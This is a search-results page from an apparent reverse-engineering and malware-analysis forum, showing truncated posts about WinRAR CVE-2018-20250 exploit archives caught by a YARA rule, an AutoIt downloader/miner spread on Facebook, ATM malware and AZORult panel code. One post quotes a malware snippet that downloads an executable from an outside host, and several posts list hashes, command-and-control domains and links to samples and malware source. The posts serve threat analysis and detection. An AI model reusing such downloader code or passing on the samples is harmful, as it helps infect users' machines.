A forum for reverse engineering, OS internals and malware analysis 

Search found 1622 matches

 Go to advanced search

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Wed May 01, 2019 7:36 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

April: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-04-01: 6dffbbe53b14d9e9ef3b758a93244d268edb370f26b11434af0930e7ea0a98b1 test.rar 57511133930b64392eb093612c0fb707b37a7c8f9ea7f629ce138fa6eeb71911 file.rar a9e94c9d13c3aa6fb9ed9deddbf2007b43c07b68e951b4c38c10dad63bdac447 evil.r...

Re: Trojan.Digmine

 by Xylitol ¦  Tue Apr 30, 2019 3:43 am ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2104

thx, I edited the thread title accordingly to Trendmicro detection. also here is another curiosity: dene.exe - 574ee5f6f38fe5b63eeb0d9bd8a7934027abf2a7b7000f79fba70e4526d94f17 - 951.0 KB Func download() Local $hdownload = InetGet("http://letask.me/test.php", "sa.exe", $inet_forcereload, $inet_downlo...

Re: AutoIt downloader/miner

 by Xylitol ¦  Sun Apr 28, 2019 7:41 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2104

Another. 8b68940459c9d22ee049e77c8ed5db77ef799ab3dedd0e7b6f75e93c49e8eed1 - 992.0 KB AnyRun have a good one about it: https://any.run/report/365167731ed69d11c2db17310e5015fc07b9d44325bf797779cff36563d9f84c/2f301ccf-e54f-4a63-8cf7-b9b43cee2799 Calling: - susu.icu - luru.icu Same design of url shorten...

Trojan.Digmine

 by Xylitol ¦  Sun Apr 28, 2019 2:23 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2104

Saw it yesterday spreading on facebook groups with random name and packed into .bz archives. https://i.imgur.com/UsBaWK1.png I got 2 samples from that (they are in attachment): 8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB 8cb158ed001eded4d7a82847cb669b68da2fac74357aa97...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Mon Apr 01, 2019 1:27 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

March: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-03-31: ceeb05b114d99453df04bba0138c597f4a87b446a55baf20d9d5a3f121dc7090 SMASH_Fornite_Logs.rar 027ccb2e3874e05fbaf750b2253c4044100021741abc77f720804de4040fe3a3 sdhong_exe.rar acc5c5092e3f7f7967f1827434e4c738e867e476c9e4ea8afc1...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Tue Mar 19, 2019 4:36 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

so far the rule works good. has been pulled also here https://github.com/Yara-Rules/rules/blob/master/CVE_Rules/CVE-2018-20250.yar ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP FILE >>>>> C:/SBOX/temp/ace/0312885f07b5a028e64c6a2a440a8584c67adf2c0986e99447328c4bede4e102 - wincon.exe -...

Global ATM Malware Wall

 by Xylitol ¦  Mon Mar 18, 2019 4:08 am ¦  Forum: General Discussion ¦  Topic: Global ATM Malware Wall ¦  Replies: 1 ¦  Views: 438

https://i.imgur.com/4RvpKuy.png Hi there, With few guys we made a zoo dedicated to malware targeting ATM platforms, as far as i know nobody has made a similar public project so voila. You will find here malwares that specifically targets ATMs, and reports (notice) about them. Files of interest got ...

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside gate v1: https://github.com/futex/Malwares-code/blob/master/Panels/AZORult/V1/gate.php gate v2: https://github.com/futex/Malwares-code/blob/master/Panels/AZORult/V2/gate.php gate...

Re: CVE-2018-20250 Exploits (WinRAR)

 by Xylitol ¦  Fri Mar 15, 2019 2:23 pm ¦  Forum: Completed Malware Requests ¦  Topic: CVE-2018-20250 Exploits (WinRAR) ¦  Replies: 1 ¦  Views: 485

attached everything except 65e6831bf0f3af34e19f25dfaef49823 (16.58 MB) and d7d30c2f26084c6cfe06bc21d7e813b1 who can be found here: viewtopic.php?f=16&t=5479

CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Fri Mar 15, 2019 2:05 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

Extracting a 19 Year Old Code Execution from WinRAR - https://research.checkpoint.com/extracting-code-execution-from-winrar/ Attackers Exploiting WinRAR UNACEV2.DLL Vulnerability (CVE-2018-20250) - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/attackers-exploiting-winrar-unacev2-dll-vu...

  • 1
  • 2
  • 3
  • 4
  • 5
  • 163